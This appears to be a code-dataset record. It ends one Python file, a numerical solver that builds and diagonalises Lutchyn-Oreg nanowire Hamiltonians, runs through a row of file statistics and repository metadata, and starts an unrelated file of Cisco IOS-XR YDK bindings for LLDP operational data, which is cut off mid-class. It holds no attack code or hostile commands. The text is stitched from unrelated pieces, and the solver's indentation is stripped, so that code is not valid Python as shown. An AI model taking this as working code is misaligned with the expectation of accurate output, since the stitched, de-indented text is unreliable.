H_add[diagonal(m,k=-1-2*Ny*Nz,step=2)] += aRz_kx
aRx_ky, aRz_ky = np.insert(aRx_ky,np.repeat(np.arange(2*(Nz*Ny-Nz),2*(Ny*Nz-Nz)*Nx,2*(Ny*Nz-Nz)),2*Nz),np.zeros(2*Nz*(Nx-1))),np.insert(aRz_ky,np.repeat(np.arange((Nz*Ny-Nz),(Ny*Nz-Nz)*Nx,(Ny*Nz-Nz)),Nz),np.zeros(Nz*(Nx-1)))
H_add[diagonal(m,k=2*Nz)] = +1j*aRx_ky
H_add[diagonal(m,k=-2*Nz)] = -1j*aRx_ky
H_add[diagonal(m,k=2*Nz-1,step=2,init=1)] += -1j*aRz_ky
H_add[diagonal(m,k=-2*Nz+1,step=2,init=1)] += 1j*aRz_ky
H_add[diagonal(m,k=1+2*Nz,step=2)] += -1j*aRz_ky
H_add[diagonal(m,k=-1-2*Nz,step=2)] += 1j*aRz_ky
aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny*Nx,(Nz-1)),np.zeros(Nx*(Ny-1)+(Nx-1)))
H_add[diagonal(m,k=1,step=2,init=1)] += aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-1,step=2,init=1)] += aRx_kz-1j*aRy_kz
H_add[diagonal(m,k=3,step=2)] += -aRx_kz+1j*aRy_kz
H_add[diagonal(m,k=-3,step=2)] += -aRx_kz-1j*aRy_kz
#Diagonalize the Hamiltonian:
if sparse=='no':
###### revisar:
if space=='position':
E, U = scipy.linalg.eigh(H+H_add, lower=False)
E, U=order_eig(E, U,sparse='no')
elif space=='momentum':
for i in range(n_k):
H_add[diagonal(m,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx)
H_add[diagonal(m,k=m-2*Ny*Nz-1,step=2,init=1)] = (-aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m+2*Ny*Nz+1,step=2,init=1)] = (-aRz_kx)*np.exp(1j*k_vec[i]*Nx)
H_add[diagonal(m,k=m+1-2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_add[diagonal(m,k=-m-1+2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(1j*k_vec[i]*Nx)
E[:,i], U[:,:,i]= scipy.linalg.eigh(H[:,:,i]+H_add, lower=False)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='no')
########
else:
if space=='position':
if np.isscalar(section) and section=='rectangular':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-5)
E, U=order_eig(E, U,sparse='yes',BdG='no')
else:
H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='SA',tol=1e-5)
E, U_hex=order_eig(E, U_hex,sparse='yes',BdG='no')
U=U_shape2rec(U_hex,section,N,dis,BdG='no')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
if not((aRy==0).all()):
H_k[diagonal(m,k=m-2*Ny*Nz)] = (-1j*aRy_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m+2*Ny*Nz)] = (+1j*aRy_kx)*np.exp(1j*k_vec[i]*Nx)
if not((aRz==0).all()):
H_k[diagonal(m,k=m-2*Ny*Nz-1,step=2,init=1)] = (-aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m+2*Ny*Nz+1,step=2,init=1)] = (-aRz_kx)*np.exp(1j*k_vec[i]*Nx)
H_k[diagonal(m,k=m+1-2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(-1j*k_vec[i]*Nx)
H_k[diagonal(m,k=-m-1+2*Ny*Nz,step=2)] = (aRz_kx)*np.exp(1j*k_vec[i]*Nx)
if np.isscalar(section) and section=='rectangular':
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='no',BdG='no')
else:
H_k=H_rec2shape(H_k,section,N,dis,BdG='no',output='H',m=m_hex)
E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
E[:,i], U_hex =order_eig(E[:,i], U_hex,sparse='yes',BdG='no')
U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='no')
return (E), (U)
#%%
def LO_3D_solver_MO(H,N,dis,
n_eig,n_orb,Nxp=None,
mu=0,aR=0,d=0,
sparse='no',section='rectangular',BdG='yes'):
"""
3D Lutchy-Oreg Hamiltonian solver. It solves the Hamiltoninan (built with
Lutchyn_builder) of a 3D Lutchy-Oreg chain using the Benjamin D. Woods
mehtod.
Parameters
----------
H_2D: arr
A 1D array whose elements H_2D[i] are 2D arrays describing the
cross-section Hamiltonian at the position x[i] of the wire. This is
built with Lutchyn_builder.
H_3D: arr
The 3D Hamiltonian which includes the orbital-coupled terms. This
is built with Lutchyn_builder.
N: arr
Number of sites in each direction.
dis: int or int
Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site supercondcuting pairing amplitude. If it is float, the
pairing is the same in every site, while if it is a 3D array,
it is the on-site pairing.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
n_orb: int
Number of molecular orbitals to include in the projection.
Nxp: int
Number of points to compute the molecular orbitals of the H_2D. For
the remaining (N[0]-Nxp) slices, it is considered that the
molecular orbitals corresponding to the first (N[0]-Nxp)/2 slices
are the same than for the slice N[Nxp]. Similarly, it is considered
that for the last (N[0]-Nxp)/2 slices, the molecular orbitals are
the same than that of N[N[0]-Nxp].
sparse: {"yes","no"}
Sparsety of the 2D Hamilonain. "yes" solves the Hamiltonian looking
for only n_eig eigenvalues, while "no" finds all.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
BdG: {"yes","no"}
If BdG is "yes", it is solved the Hamiltonian in the Bogoliubov-de
Gennes formalism.
Returns
-------
E_3D: arr (n_eig)
Eigevalues (energies), ordered from smaller to larger.
U_1D: arr ((2 x N[0]) x n_eig)*(BdG=='yes') + ((N[0]) x n_eig)*(BdG=='no')
Eigenvectors of the effective 1D problem.
U_2D: arr ((2 x N[1] x N[2] x N[0]) x (n_orb x N[0]))
Eigenvectors of the 2D slices in each point along the wire.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
if not(Nxp==None or Nxp==N[0]):
N_dif=np.int((Nx-Nxp)/2)
else:
Nxp, N_dif = Nx, 0
m = int(2 * Nx * Ny * Nz)
#Make sure that the onsite parameters are arrays:
if BdG=='no':
H_2D,H_3D=H
elif BdG=='yes':
H_2D,H_3D,H_SC=H
if np.isscalar(mu):
mu = mu * np.ones((Nx,Ny,Nz))
else:
if len(mu[:,0,0])<Nx and len(mu[:,0,0])==Nxp:
mu_temp=np.zeros((Nx,Ny,Nz))
for i in range(Nx):
if i<=N_dif:
mu_temp[i,:,:]=mu[0,:,:]
elif i>=(Nx-N_dif):
mu_temp[i,:,:]=mu[-1,:,:]
else:
mu_temp[i,:,:]=mu[i-N_dif,:,:]
mu=mu_temp
if not(isinstance(aR,str) or isinstance(aR,dict)):
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=np.zeros((Nx,Ny,Nz))
if np.isscalar(d) and not(d==0) and BdG=='yes':
d = d * np.ones((Nx,Ny,Nz))
#Add new value:
if not(isinstance(aR,str) or isinstance(aR,dict)) and not((aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRy_kx[1::2] = -aRy_kx[::2]
H_3D[diagonal(m,k=2*Ny*Nz)] += -1j*aRy_kx
H_3D[diagonal(m,k=-2*Ny*Nz)] += +1j*aRy_kx
H_3D[diagonal(m,k=2*Ny*Nz-1,step=2,init=1)] += -aRz_kx
H_3D[diagonal(m,k=-2*Ny*Nz+1,step=2,init=1)] += -aRz_kx
H_3D[diagonal(m,k=1+2*Ny*Nz,step=2)] += aRz_kx
H_3D[diagonal(m,k=-1-2*Ny*Nz,step=2)] += aRz_kx
if not(np.isscalar(d)) and BdG=='yes':
d=d.flatten()
H_SC[diagonal(m,k=1,step=2)] += -np.conj(d)
H_SC[diagonal(m,k=-1,step=2)] += np.conj(d)
#Obtain the orbital basis:
E_2D, U_2D = np.zeros(n_orb * Nx), scipy.sparse.dok_matrix((m,int(n_orb * Nx)),dtype=complex)
for i in range(Nx):
if i<N_dif:
continue
elif (i>=N_dif) and (i<=(Nx-N_dif)):
if sparse=='no':
E_temp, U_temp = LO_2D_solver_NoSC(H_2D[i-N_dif].todense(),N[1::],dis[1::],mu=mu[i,:,:],B=0,aR=np.array([aRx[i,:,:],aRy[i,:,:],aRz[i,:,:]]),space='position',sparse='no',section=section)
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = order_eig(E_temp[0:n_orb],U_temp[:,0:n_orb],sparse='no',BdG='no')
elif sparse=='yes':
E_temp, U_temp = LO_2D_solver_NoSC(H_2D[i-N_dif],N[1::],dis[1::],mu=mu[i,:,:],B=0,aR=np.array([aRx[i,:,:],aRy[i,:,:],aRz[i,:,:]]),space='position',sparse='yes',n_eig=n_orb,section=section)
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = order_eig(E_temp,U_temp,BdG='no')
if i==N_dif:
for j in range(N_dif):
E_2D[j*n_orb:(j+1)*n_orb], U_2D[2 * Ny * Nz * j:2 * Ny * Nz * (j+1),j*n_orb:(j+1)*n_orb] = E_2D[N_dif*n_orb:(N_dif+1)*n_orb], U_2D[2 * Ny * Nz * N_dif:2 * Ny * Nz * (N_dif+1),N_dif*n_orb:(N_dif+1)*n_orb]
elif i>(Nx-N_dif):
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = E_2D[(Nx-N_dif)*n_orb:((Nx-N_dif)+1)*n_orb], U_2D[2 * Ny * Nz * (Nx-N_dif):2 * Ny * Nz * ((Nx-N_dif)+1),(Nx-N_dif)*n_orb:((Nx-N_dif)+1)*n_orb]
#Obtain the effective multiorbital 1D Hamiltonian:
H_1D=(U_2D.transpose().conjugate()).dot(H_3D.dot(U_2D))+scipy.sparse.diags(E_2D)
#Include the SC:
if BdG=='yes':
H_1D_SC=((U_2D.transpose().conjugate()).dot(H_SC.dot(U_2D.conjugate())))
H_1D=scipy.sparse.vstack([scipy.sparse.hstack([H_1D,H_1D_SC]),scipy.sparse.hstack([np.transpose(np.conj(H_1D_SC)),-np.conj(H_1D)])])
#Diagonalize the effective 1D Hamiltonian:
if BdG=='no':
E_3D,U_1D = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_1D),k = n_eig, which='SA',tol=1e-5)
else:
E_3D,U_1D = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_1D),k = n_eig,sigma=0, which='LM',tol=1e-5)
#Project the eigenvector into the original basis:
if BdG=='yes':
zeros=scipy.sparse.dok_matrix((m,int(n_orb * Nx)),dtype=complex)
U_2D_SC=scipy.sparse.vstack([scipy.sparse.hstack([U_2D,zeros]),scipy.sparse.hstack([zeros,np.conj(U_2D)])])
U_3D=((U_2D_SC.dot(scipy.sparse.csc_matrix(U_1D))).todense()).A
E_3D,U_3D=order_eig(E_3D,U_3D,sparse='yes',BdG='no')
elif BdG=='no':
U_3D=((U_2D.dot(scipy.sparse.csc_matrix(U_1D))).todense()).A
E_3D,U_3D=order_eig(E_3D,U_3D,sparse='yes',BdG='yes')
return (E_3D,U_3D)
| 44.048405 | 245 | 0.517433 | 13,156 | 80,080 | 3.070082 | 0.026604 | 0.009309 | 0.021292 | 0.011587 | 0.944293 | 0.938203 | 0.930602 | 0.926814 | 0.921218 | 0.913815 | 0 | 0.034881 | 0.306194 | 80,080 | 1,817 | 246 | 44.072647 | 0.692081 | 0.346791 | 0 | 0.754738 | 0 | 0 | 0.020978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007804 | false | 0 | 0.007804 | 0 | 0.023411 | 0.001115 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c071d8d907db1a439134b34c7fb17b38befd594 | 171,036 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_ethernet_lldp_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ethernet\-lldp package operational data.
This module contains definitions
for the following management objects\:
lldp\: Link Layer Discovery Protocol operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class LldpL3AddrProtocol(Enum):
"""
LldpL3AddrProtocol (Enum Class)
Lldp l3 addr protocol
.. data:: ipv4 = 0
IPv4
.. data:: ipv6 = 1
IPv6
"""
ipv4 = Enum.YLeaf(0, "ipv4")
ipv6 = Enum.YLeaf(1, "ipv6")
class Lldp(Entity):
"""
Link Layer Discovery Protocol operational data
.. attribute:: global_lldp
Global LLDP data
**type**\: :py:class:`GlobalLldp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.GlobalLldp>`
.. attribute:: nodes
Per node LLDP operational data
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp, self).__init__()
self._top_entity = None
self.yang_name = "lldp"
self.yang_parent_name = "Cisco-IOS-XR-ethernet-lldp-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("global-lldp", ("global_lldp", Lldp.GlobalLldp)), ("nodes", ("nodes", Lldp.Nodes))])
self._leafs = OrderedDict()
self.global_lldp = Lldp.GlobalLldp()
self.global_lldp.parent = self
self._children_name_map["global_lldp"] = "global-lldp"
self.nodes = Lldp.Nodes()
self.nodes.parent = self
self._children_name_map["nodes"] = "nodes"
self._segment_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp, [], name, value)
class GlobalLldp(Entity):
"""
Global LLDP data
.. attribute:: lldp_info
The LLDP Global Information of this box
**type**\: :py:class:`LldpInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.GlobalLldp.LldpInfo>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.GlobalLldp, self).__init__()
self.yang_name = "global-lldp"
self.yang_parent_name = "lldp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-info", ("lldp_info", Lldp.GlobalLldp.LldpInfo))])
self._leafs = OrderedDict()
self.lldp_info = Lldp.GlobalLldp.LldpInfo()
self.lldp_info.parent = self
self._children_name_map["lldp_info"] = "lldp-info"
self._segment_path = lambda: "global-lldp"
self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.GlobalLldp, [], name, value)
class LldpInfo(Entity):
"""
The LLDP Global Information of this box
.. attribute:: chassis_id
Chassis identifier
**type**\: str
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: timer
Rate at which LLDP packets re sent (in sec)
**type**\: int
**range:** 0..4294967295
.. attribute:: hold_time
Length of time (in sec)that receiver must keep thispacket
**type**\: int
**range:** 0..4294967295
.. attribute:: re_init
Delay (in sec) for LLDPinitialization on anyinterface
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.GlobalLldp.LldpInfo, self).__init__()
self.yang_name = "lldp-info"
self.yang_parent_name = "global-lldp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('timer', (YLeaf(YType.uint32, 'timer'), ['int'])),
('hold_time', (YLeaf(YType.uint32, 'hold-time'), ['int'])),
('re_init', (YLeaf(YType.uint32, 're-init'), ['int'])),
])
self.chassis_id = None
self.chassis_id_sub_type = None
self.system_name = None
self.timer = None
self.hold_time = None
self.re_init = None
self._segment_path = lambda: "lldp-info"
self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/global-lldp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.GlobalLldp.LldpInfo, [u'chassis_id', u'chassis_id_sub_type', u'system_name', u'timer', u'hold_time', u're_init'], name, value)
class Nodes(Entity):
"""
Per node LLDP operational data
.. attribute:: node
The LLDP operational data for a particular node
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes, self).__init__()
self.yang_name = "nodes"
self.yang_parent_name = "lldp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("node", ("node", Lldp.Nodes.Node))])
self._leafs = OrderedDict()
self.node = YList(self)
self._segment_path = lambda: "nodes"
self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes, [], name, value)
class Node(Entity):
"""
The LLDP operational data for a particular node
.. attribute:: node_name (key)
The identifier for the node
**type**\: str
**pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)
.. attribute:: neighbors
The LLDP neighbor tables on this node
**type**\: :py:class:`Neighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors>`
.. attribute:: interfaces
The table of interfaces on which LLDP is running on this node
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces>`
.. attribute:: statistics
The LLDP traffic statistics for this node
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Statistics>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node, self).__init__()
self.yang_name = "node"
self.yang_parent_name = "nodes"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['node_name']
self._child_classes = OrderedDict([("neighbors", ("neighbors", Lldp.Nodes.Node.Neighbors)), ("interfaces", ("interfaces", Lldp.Nodes.Node.Interfaces)), ("statistics", ("statistics", Lldp.Nodes.Node.Statistics))])
self._leafs = OrderedDict([
('node_name', (YLeaf(YType.str, 'node-name'), ['str'])),
])
self.node_name = None
self.neighbors = Lldp.Nodes.Node.Neighbors()
self.neighbors.parent = self
self._children_name_map["neighbors"] = "neighbors"
self.interfaces = Lldp.Nodes.Node.Interfaces()
self.interfaces.parent = self
self._children_name_map["interfaces"] = "interfaces"
self.statistics = Lldp.Nodes.Node.Statistics()
self.statistics.parent = self
self._children_name_map["statistics"] = "statistics"
self._segment_path = lambda: "node" + "[node-name='" + str(self.node_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/nodes/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node, ['node_name'], name, value)
class Neighbors(Entity):
"""
The LLDP neighbor tables on this node
.. attribute:: devices
The detailed LLDP neighbor table on this device
**type**\: :py:class:`Devices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices>`
.. attribute:: details
The detailed LLDP neighbor table
**type**\: :py:class:`Details <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details>`
.. attribute:: summaries
The LLDP neighbor summary table
**type**\: :py:class:`Summaries <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors, self).__init__()
self.yang_name = "neighbors"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("devices", ("devices", Lldp.Nodes.Node.Neighbors.Devices)), ("details", ("details", Lldp.Nodes.Node.Neighbors.Details)), ("summaries", ("summaries", Lldp.Nodes.Node.Neighbors.Summaries))])
self._leafs = OrderedDict()
self.devices = Lldp.Nodes.Node.Neighbors.Devices()
self.devices.parent = self
self._children_name_map["devices"] = "devices"
self.details = Lldp.Nodes.Node.Neighbors.Details()
self.details.parent = self
self._children_name_map["details"] = "details"
self.summaries = Lldp.Nodes.Node.Neighbors.Summaries()
self.summaries.parent = self
self._children_name_map["summaries"] = "summaries"
self._segment_path = lambda: "neighbors"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors, [], name, value)
class Devices(Entity):
"""
The detailed LLDP neighbor table on this
device
.. attribute:: device
Detailed information about a LLDP neighbor entry
**type**\: list of :py:class:`Device <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices, self).__init__()
self.yang_name = "devices"
self.yang_parent_name = "neighbors"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("device", ("device", Lldp.Nodes.Node.Neighbors.Devices.Device))])
self._leafs = OrderedDict()
self.device = YList(self)
self._segment_path = lambda: "devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices, [], name, value)
class Device(Entity):
"""
Detailed information about a LLDP neighbor
entry
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device, self).__init__()
self.yang_name = "device"
self.yang_parent_name = "devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor))])
self._leafs = OrderedDict([
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.device_id = None
self.interface_name = None
self.lldp_neighbor = YList(self)
self._segment_path = lambda: "device"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device, ['device_id', 'interface_name'], name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail>`
.. attribute:: mib
MIB nieghbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor, self).__init__()
self.yang_name = "lldp-neighbor"
self.yang_parent_name = "device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib))])
self._leafs = OrderedDict([
('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('platform', (YLeaf(YType.str, 'platform'), ['str'])),
])
self.receiving_interface_name = None
self.receiving_parent_interface_name = None
self.device_id = None
self.chassis_id = None
